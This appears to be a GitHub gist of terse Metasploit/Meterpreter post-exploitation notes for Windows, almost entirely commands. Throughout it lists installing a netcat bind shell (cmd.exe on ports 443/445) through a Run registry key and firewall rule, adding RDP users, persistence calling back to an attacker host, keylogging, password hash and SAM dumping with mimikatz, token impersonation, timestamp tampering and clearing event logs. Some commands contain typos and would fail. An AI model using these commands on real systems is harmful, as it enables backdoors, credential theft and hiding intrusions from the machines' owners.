Created
September 6, 2018 19:38
-
-
Save JPMonglis/a886662b9ebcd2044509567eb02d76ca to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## msf netcat backdoor in persistance | |
- netcat is uncluded in metasploit | |
- | |
- upload /usr/share/windwos-binaries/nc.exe C:\\windows\\system32 ## must have system rights | |
- | |
- | |
- ## registry key adding | |
- echo reg enumkey -k HKLM\\Software\\microsoft\\windows\\currentversion\\run | |
- echo reg setval -k HKLM\\Software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe' | |
- echo reg queryval -k HKLM\\Software\\microsoft\\windows\\currentversion\\run -v nc | |
- | |
- ## firewall config nedd shell with system auth | |
- netsh advifrewall firewall add rule "netcat" protocol=tcp localport=443 dir=in action=allow | |
- program"=C:windows\system32\nc.exe" | |
- | |
- ## GETgui | |
- run getgui -h | |
- getgui -u 'username' -p 'password' ## system privs {rdekstop -u username -p password IP} | |
- | |
- | |
- ## PORT FORWARDING | |
- portfwd -h | |
- portfwd add -l 443 -p 443 -r IP | |
- | |
- ## modify files | |
- timestomp -h | |
- | |
- ## KEYLOGGING | |
- keyscan_start | |
- keyscan_dump | |
- keyscan_stop | |
- | |
- | |
- ## persistance | |
- persistance -U -i 15 -p 443 -r lhost | |
- | |
- | |
- | |
- ## mimikatz | |
- | |
- load mimikatz | |
- help mimikatz | |
- mimikatz_command -f version | |
- mimikatz_command -f blah:: | |
- kerberos | |
- mimikatz_command -f sandump::hashes | |
- mimikatz_command -f sandump::bootkey | |
- mimikatz_command -f crypto:: | |
MSF wiki B' | |
search type:exploit platform:windows | |
search author:HDM type:exploit | |
search cve:1234 | |
show ..exploits | |
*grep vnc search type:exploit | |
mtpr> getuid | |
mtpr> getprivs | |
mtpr> ifconfig | |
mtpr> sysinfo | |
mtpr> hashdump | |
mtpr> download C:\\path\\to\\file | |
mtpr> upload fileToUpload C:\\path | |
mtpr> execute -f programToRun -i H | |
mtpr> search -f test.* | |
mtpr> run post/windows/gather/enum_applications | |
mtpr> run post/windows/gather/enum_services | |
mtpr> getpid payload.exe | |
mtpr> migrate svchost.exe | |
mtpr> keyscan_start - dump - stop | |
mtpr> clearev | |
##Running incognito | |
mtpr> use incognito | |
mtpr> list_tokens | |
mtpr> impersonate_token user\\user | |
##Backdoor with netcat | |
mtpr> upload usr/share/windows-binaries/nc.exe C:\\path\\to\\file\\ | |
mtpr> reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run | |
mtpr> reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\\path\\nc.exe -Ldp 445 -e cmd.exe | |
mtpr> reg queyval -k HKLM\\software\\microsoft\\windows\\currentversion\\run | |
shell> netsh advfirewall firewall add rule name="netcat" protocol=tcp localport=445 dir=in action=allow program="C:\\path\\to\\exe | |
##Remote Desktop Access | |
mtpr> run getgui -u newUser -p newPass | |
rdesktop -u user -p pass 192.168.1.1 | |
##Port Forwarding | |
mtpr> portfwd add -l 445 -p 445 -r 192.168.1.1 | |
mtpr> run persistance -U -i 15 -o 443 -r 192.168.1.1 | |
mtpr> use mimikatz | |
mtpr> mimikatz_command -f version | |
mtpr> mimikatz_command -f blah:: | |
mtpr> kerberos | |
mtpr> help mimikatz | |
mtpr> mimikatz_command -f samdump:: | |
mtpr> mimikatz_command -f samdump::bootkey |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment